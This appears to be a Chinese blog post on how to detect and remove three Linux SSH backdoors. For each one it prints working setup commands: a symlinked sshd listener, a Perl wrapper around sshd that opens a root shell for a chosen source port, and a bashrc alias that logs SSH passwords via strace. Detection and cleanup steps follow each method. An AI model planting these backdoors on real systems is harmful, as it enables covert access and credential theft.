linux mysql backdoor_Linux SSH Backdoor分析排查

1、SSH后门分类

SSH后门方式有以下几种

软链接

SSH Server wrapper

SSH Keylogger

2、软链接

利用方法

[root@helen]# ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=2333;

排查方法

[root@helen]# netstat -anop

76685ae297f18c12bb2e5402b356ec36.png

通过开发端口信息的PID查询进程路径,【ll /proc/xxxx】命令查看程序对应的路径。

cc51c5e560d38be68e196dd08c798114.png

清除后门

kill -9 pid

rm -rf 后门程序

3、SSH Server wrapper

利用方法

先将/usr/sbin/sshd文件mv到/usr/bin目录

[root@helen ~]# cd /usr/sbin/

[root@helen sbin]# mv sshd ../bin

[root@helen sbin]# vim sshd

再编辑sshd

#!/usr/bin/perl

exec"/bin/sh"if(getpeername(STDIN)=~/^..LF/);

exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;

再设置权限

chmod 755 sshd

攻击者:

在本机上执行socat STDIO TCP4:target_ip:22,sourceport=19526

cc5aac4752b61d65a78cd1dbefb193e8.png

排查方法

查看端口可以看到网络外链的端口

e644935b5ae7871084199a9ff7aa3f90.png

因为正常的sshd路径是在/usr/sbin/sshd,通过命令【ll /proc/xxx】查看sshd的路径路径在/usr/bin/sshd。所以断定sshd被动过手脚。

通过查看sshd文件可得知sshd的确被动过手脚。

cat /usr/sbin/sshd

清除后门

rm -rf /usr/sbin/sshd; mv /usr/bin/sshd ../sbin;

4、SSH Keylogger

利用方法

编辑当前用户下的.bashrc文件

vi /root/.bashrc

在最后面添加如下后门代码:

alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'

【source .bashrc】命令使更改的配置生效

e16ae0f8fd0b50eb3c861ae8c8b6b402.png

ssh连接或者su切换用户,输入密码时的密码,无论错误或者正确都能记录到log里

排查方法

排查环境变量

清除后门

清空增加的环境变量内容

5、参考

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值